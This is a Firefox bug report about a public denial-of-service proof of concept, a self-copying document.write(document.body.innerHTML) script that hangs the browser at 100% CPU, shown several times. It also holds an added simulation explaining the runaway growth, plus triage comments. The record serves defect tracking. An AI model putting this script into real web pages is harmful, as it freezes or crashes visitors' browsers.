Open Bug 612029 Opened 14 years ago Updated 3 months ago

document.write(document.body.innerHTML) DOS Attack (hang with 100% CPU) (exploit-db 15498) (missing slow script dialog)

Categories

(Firefox :: General, defect)

x86
Windows XP
defect

Tracking

()

Tracking Status
blocking2.0 --- -
status1.9.2 --- wanted
status1.9.1 --- wanted

People

(Reporter: pusat_6807, Unassigned)

References

(Depends on 2 open bugs, )

Details

(Keywords: csectype-dos, hang, Whiteboard: [sg:dos])

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12

<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>
<script>
var i=0;
for (i=0;i<=19999;i++) { document.write("a"); }
for (i=0;i<=3;i++) { document.write(document.body.innerHTML); }
</script>

Reproducible: Always

Steps to Reproduce:
1. DDoS attack
2.
3.

Actual Results:
<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>
<script>
var i=0;
for (i=0;i<=19999;i++) { document.write("a"); }
for (i=0;i<=3;i++) { document.write(document.body.innerHTML); }
</script>

Expected Results:
<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>
<script>
var i=0;
for (i=0;i<=19999;i++) { document.write("a"); }
for (i=0;i<=3;i++) { document.write(document.body.innerHTML); }
</script>

<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>
<script>
var i=0;
for (i=0;i<=19999;i++) { document.write("a"); }
for (i=0;i<=3;i++) { document.write(document.body.innerHTML); }
</script>

<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>
<script>
var i=0;
for (i=0;i<=19999;i++) { document.write("a"); }
for (i=0;i<=3;i++) { document.write(document.body.innerHTML); }
</script>
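The runaway growth behind the reported snippet can be reasoned about without a browser. What follows is an added simulation written for this page; it is not code from the report, from exploit-db or from Firefox. Its assumptions are constructed for the model and not stated on the page: every <script> that document.write() copies back into the input stream runs again when the parser reaches it, body.innerHTML serializes everything parsed so far (the loop script included), script and parser cost are both counted as bytes handled, and a byte budget stands in for running out of memory so the loop terminates.

```javascript
// Added simulation for this bug page; not code from the report, exploit-db
// or Firefox. It models the self-copying document.write() pattern with a
// byte budget so it terminates. Model assumptions (constructed, not from the
// page): every <script> that document.write() copies into the input stream
// runs again when the parser reaches it, body.innerHTML serializes everything
// parsed so far, and parser and script work are counted as bytes handled.

const SEED_CHARS = 20000;     // for (i=0;i<=19999;i++) document.write("a")
const COPIES = 4;             // for (i=0;i<=3;i++) document.write(document.body.innerHTML)
const SCRIPT_SRC_BYTES = 160; // assumed serialized size of the loop script element

// Fragments are what the parser hands to the document: text of some length,
// or the loop script (whose serialized form is part of body.innerHTML).
const text = (len) => ({ kind: "text", len });
const script = () => ({ kind: "script", len: SCRIPT_SRC_BYTES });
const bytesOf = (frags) => frags.reduce((n, f) => n + f.len, 0);
const scriptsIn = (frags) => frags.filter((f) => f.kind === "script").length;

// Runs the parser/script loop until body plus pending input exceeds byteBudget.
// With copies >= 1 the input stream never drains: that is the hang.
function simulate(byteBudget, { seedChars = SEED_CHARS, copies = COPIES } = {}) {
  const body = [];
  let stream = [script()];  // the initial markup: just the loop script
  let scriptRuns = 0;
  let maxSingleRun = 0;     // work done by the longest single script execution
  let totalWork = 0;        // all work, script-side and parser-side
  let aborted = false;

  while (stream.length > 0) {
    const frag = stream.shift();
    body.push(frag);        // the parser inserts a node before any script in it runs
    totalWork += frag.len;
    if (frag.kind !== "script") continue;

    scriptRuns += 1;
    body.push(text(seedChars));   // document.write("a") x seedChars
    let work = seedChars;
    // document.write(document.body.innerHTML) x copies: a snapshot of the body,
    // scripts included, is queued right after this script in the input stream,
    // so every script in every copy will execute again later.
    const snapshot = body.map((f) => ({ ...f }));
    const written = [];
    for (let i = 0; i < copies; i++) {
      written.push(...snapshot.map((f) => ({ ...f })));
      work += bytesOf(snapshot);  // serializing the body costs its size each time
    }
    stream = written.concat(stream);
    totalWork += work;
    maxSingleRun = Math.max(maxSingleRun, work);

    if (bytesOf(body) + bytesOf(stream) > byteBudget) {
      aborted = true;  // the stand-in for running out of memory
      break;
    }
  }
  return {
    scriptRuns,
    aborted,
    bodyBytes: bytesOf(body),
    pendingBytes: bytesOf(stream),
    pendingScripts: scriptsIn(stream),
    maxSingleRun,
    totalWork,
  };
}

// Stand-alone demonstration: the report's loop counts against a constructed
// 1 MB budget, and the same page with the innerHTML loop removed.
console.log("report pattern:", simulate(1_000_000));
console.log("without innerHTML copies:", simulate(1_000_000, { copies: 0 }));
```

Under these assumptions the input stream never drains once copies is at least 1: each execution queues four snapshots that each carry every script parsed so far, so the number of pending scripts and the pending bytes climb with every run while the body itself grows by a fixed amount per run. No single execution does more than a fraction of the total work, which is the distinction a per-script watchdog such as the slow-script dialog the later comments ask about is measuring, and it is consistent with the reported outcome of 100% CPU with no dialog until the OOM killer steps in. The byte budget in the model is the kind of aggregate limit, on document size or total parse work rather than per-script time, that a defender would look for.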
blocking1.9.1: --- → ?
blocking1.9.2: --- → ?
blocking2.0: --- → ?
This was published 2010-11-12 at http://www.exploit-db.com/exploits/15498/
I don't see any crash using Fx 3.6.12 on WinXP, just a 100% CPU hang.
Keywords: hang
We probably didn't need 5 copies of the code in-line... Since it's public at exploit-db there's no point in keeping the bug hidden, we'll just get dupes.
Group: core-security
Summary: ddos Atack Crashed → dos Atack Crashed (exploit-db 15498)
Whiteboard: [sg:dos]
blocking1.9.1: ? → ---
blocking1.9.2: ? → ---
Summary: dos Atack Crashed (exploit-db 15498) → dos Attack Crashed (exploit-db 15498)
Is 4.0 afflicted?
Summary: dos Attack Crashed (exploit-db 15498) → dos Attack (hang with 100% CPU) (exploit-db 15498)
(In reply to comment #6)
> Is 4.0 afflicted?

Yes, in the same way as 3.6.12: 100% CPU, no crash, no "slow script" dialog. Tested on Linux, WinXP and OSX. On Linux, the OOM killer kills the process after ~10 seconds.
We should at least figure out if we can make the slow-script dialog show up.
Status: UNCONFIRMED → NEW
Ever confirmed: true
blocking2.0: ? → -
Depends on: 641105
Summary: dos Attack (hang with 100% CPU) (exploit-db 15498) → document.write(document.body.innerHTML) DOS Attack (hang with 100% CPU) (exploit-db 15498) (missing slow script dialog)
Severity: normal → S3

The severity field for this bug is relatively low, S3. However, the bug has 10 duplicates.
:mossop, could you consider increasing the bug severity?

For more information, please visit auto_nag documentation.

Flags: needinfo?(dtownsend)

The last needinfo from me was triggered in error by recent activity on the bug. I'm clearing the needinfo since this is a very old bug and I don't know if it's still relevant.

Flags: needinfo?(dtownsend)
See Also: → 1895161
Depends on: eviltraps
Keywords: csectype-dos